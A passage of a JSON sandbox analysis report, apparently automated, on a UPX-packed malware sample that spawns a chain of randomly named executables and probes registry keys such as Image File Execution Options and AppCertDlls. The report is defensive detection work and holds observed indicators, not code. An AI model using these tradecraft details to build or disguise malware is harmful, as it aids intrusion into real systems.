"T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4822004.exe\" (UID: 00000000-00006044)\n Spawned process \"26224.exe\" (UID: 00000000-00005968)\n Spawned process \"226242.exe\" (UID: 00000000-00005996)\n Spawned process \"8402624.exe\" (UID: 00000000-00005928)\n Spawned process \"484648.exe\" (UID: 00000000-00006016)\n Spawned process \"4262848.exe\" (UID: 00000000-00005936)\n Spawned process \"20484.exe\" (UID: 00000000-00003884)\n Spawned process \"806288.exe\" (UID: 00000000-00004216)\n Spawned process \"hrrrr.exe\" (UID: 00000000-00006088)\n Spawned process \"vvvtjhp.exe\" (UID: 00000000-00006124)\n Spawned process \"fvbll.exe\" (UID: 00000000-00003980)\n Spawned process \"lpljbv.exe\" (UID: 00000000-00004328)\n Spawned process \"rjldjr.exe\" (UID: 00000000-00002288)\n Spawned process \"ljlpvrx.exe\" (UID: 00000000-00006072)\n Spawned process \"bfbfxx.exe\" (UID: 00000000-00003812)\n Spawned process \"2046660.exe\" (UID: 00000000-00003748)\n Spawned process \"40484.exe\" (UID: 00000000-00001660)\n Spawned process \"jtjnrb.exe\" (UID: 00000000-00004464)\n Spawned process \"pvtnp.exe\" (UID: 00000000-00004252)\n Spawned process \"nxlhfx.exe\" (UID: 00000000-00002804)\n Spawned process \"pddnp.exe\" (UID: 00000000-00002380)\n Spawned process \"tplfhb.exe\" (UID: 00000000-00004280)\n Spawned process \"60202.exe\" (UID: 00000000-00004244)\n Spawned process \"6260866.exe\" (UID: 00000000-00004508)\n Spawned process \"6686484.exe\" (UID: 00000000-00003440)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" was detected as \"UPX\" and name: \"Packer\"\n \"20406.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"486604.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2028060.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dprdh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nfhppl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4080282.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vjntv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bpfndvl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"blrpxnl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pvrjd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nbdbxn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tlvnl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dtrfjn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lvttpxb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lxvdh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jbbxlvh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4408646.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"86668.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"08086.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"624642.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"48064.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lxdxh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hltjhx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fnlpb.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03efe6a@ADVAPI32.dll\"\n \"0e000f00703ffe6a@ADVAPI32.dll\"\n \"0e000f00cc3ffe6a@ADVAPI32.dll\"\n \"11001200b447fe6a@ADVAPI32.dll\"\n \"110012004848fe6a@ADVAPI32.dll\"\n \"120013008c48fe6a@ADVAPI32.dll\"\n \"12001300e448fe6a@ADVAPI32.dll\"\n \"14001500386efe6a@ADVAPI32.dll\"\n \"14001500506efe6a@ADVAPI32.dll\"\n \"14001500686efe6a@ADVAPI32.dll\"\n \"17001800806efe6a@ADVAPI32.dll\"\n \"0d000e00986efe6a@ADVAPI32.dll\"\n \"11001200a86efe6a@ADVAPI32.dll\"\n \"11001200bc6efe6a@ADVAPI32.dll\"\n \"0f001000fc6ffe6a@ADVAPI32.dll\"\n \"140015003c70fe6a@ADVAPI32.dll\"\n \"140015005470fe6a@ADVAPI32.dll\"\n \"0c000d009c70fe6a@ADVAPI32.dll\"\n \"0c000d00ac70fe6a@ADVAPI32.dll\"\n \"0e000f00bc70fe6a@ADVAPI32.dll\"\n \"0e000f00cc70fe6a@ADVAPI32.dll\"\n \"0b000c00dc70fe6a@ADVAPI32.dll\"\n \"180019001473fe6a@RPCRT4.dll\"\n \"130014004073fe6a@RPCRT4.dll\"\n \"140015005473fe6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"CreateProcessA\" with parameter \"c:\\4822004.exe\" - (UID: 00000000-00005920)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an executable section named \"UPX0\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an executable section named \"UPX1\"\n \"20406.exe\" has an executable section named \"UPX0\"\n \"20406.exe\" has an executable section named \"UPX1\"\n \"486604.exe\" has an executable section named \"UPX0\"\n \"486604.exe\" has an executable section named \"UPX1\"\n \"2028060.exe\" has an executable section named \"UPX0\"\n \"2028060.exe\" has an executable section named \"UPX1\"\n \"dprdh.exe\" has an executable section named \"UPX0\"\n \"dprdh.exe\" has an executable section named \"UPX1\"\n \"nfhppl.exe\" has an executable section named \"UPX0\"\n \"nfhppl.exe\" has an executable section named \"UPX1\"\n \"4080282.exe\" has an executable section named \"UPX0\"\n \"4080282.exe\" has an executable section named \"UPX1\"\n \"vjntv.exe\" has an executable section named \"UPX0\"\n \"vjntv.exe\" has an executable section named \"UPX1\"\n \"bpfndvl.exe\" has an executable section named \"UPX0\"\n \"bpfndvl.exe\" has an executable section named \"UPX1\"\n \"blrpxnl.exe\" has an executable section named \"UPX0\"\n \"blrpxnl.exe\" has an executable section named \"UPX1\"\n \"pvrjd.exe\" has an executable section named \"UPX0\"\n \"pvrjd.exe\" has an executable section named \"UPX1\"\n \"nbdbxn.exe\" has an executable section named \"UPX0\"\n \"nbdbxn.exe\" has an executable section named \"UPX1\"\n \"tlvnl.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an writable section named \"UPX0\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an writable section named \"UPX1\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an writable section named \"UPX2\"\n \"20406.exe\" has an writable section named \"UPX0\"\n \"20406.exe\" has an writable section named \"UPX1\"\n \"20406.exe\" has an writable section named \"UPX2\"\n \"486604.exe\" has an writable section named \"UPX0\"\n \"486604.exe\" has an writable section named \"UPX1\"\n \"486604.exe\" has an writable section named \"UPX2\"\n \"2028060.exe\" has an writable section named \"UPX0\"\n \"2028060.exe\" has an writable section named \"UPX1\"\n \"2028060.exe\" has an writable section named \"UPX2\"\n \"dprdh.exe\" has an writable section named \"UPX0\"\n \"dprdh.exe\" has an writable section named \"UPX1\"\n \"dprdh.exe\" has an writable section named \"UPX2\"\n \"nfhppl.exe\" has an writable section named \"UPX0\"\n \"nfhppl.exe\" has an writable section named \"UPX1\"\n \"nfhppl.exe\" has an writable section named \"UPX2\"\n \"4080282.exe\" has an writable section named \"UPX0\"\n \"4080282.exe\" has an writable section named \"UPX1\"\n \"4080282.exe\" has an writable section named \"UPX2\"\n \"vjntv.exe\" has an writable section named \"UPX0\"\n \"vjntv.exe\" has an writable section named \"UPX1\"\n \"vjntv.exe\" has an writable section named \"UPX2\"\n \"bpfndvl.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"20406.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"486604.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2028060.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dprdh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nfhppl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4080282.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vjntv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bpfndvl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"blrpxnl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pvrjd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nbdbxn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tlvnl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dtrfjn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lvttpxb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lxvdh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jbbxlvh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4408646.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"86668.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"08086.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"624642.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"48064.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lxdxh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hltjhx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fnlpb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"4822004.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"4822004.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"4822004.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"4822004.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"4822004.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"4822004.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" reads file \"c:\\7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" reads file \"c:\\4822004.exe\"\n \"4822004.exe\" reads file \"c:\\4822004.exe\"\n \"4822004.exe\" reads file \"c:\\26224.exe\"\n \"26224.exe\" reads file \"c:\\26224.exe\"\n \"26224.exe\" reads file \"c:\\226242.exe\"\n \"226242.exe\" reads file \"c:\\226242.exe\"\n \"226242.exe\" reads file \"c:\\8402624.exe\"\n \"8402624.exe\" reads file \"c:\\8402624.exe\"\n \"8402624.exe\" reads file \"c:\\484648.exe\"\n \"484648.exe\" reads file \"c:\\484648.exe\"\n \"484648.exe\" reads file \"c:\\4262848.exe\"\n \"4262848.exe\" reads file \"c:\\4262848.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4822004.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"26224.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"226242.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8402624.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"484648.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4262848.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"20484.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"806288.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hrrrr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vvvtjhp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fvbll.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lpljbv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rjldjr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ljlpvrx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bfbfxx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2046660.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"40484.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jtjnrb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pvtnp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nxlhfx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pddnp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tplfhb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"60202.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6260866.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\4822004.EXE\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"7481BBEDBC273334586530C04B45FA23DB4A5F57E91C31DECBD96F94EC48E26C\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"c:\\4822004.exe\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n 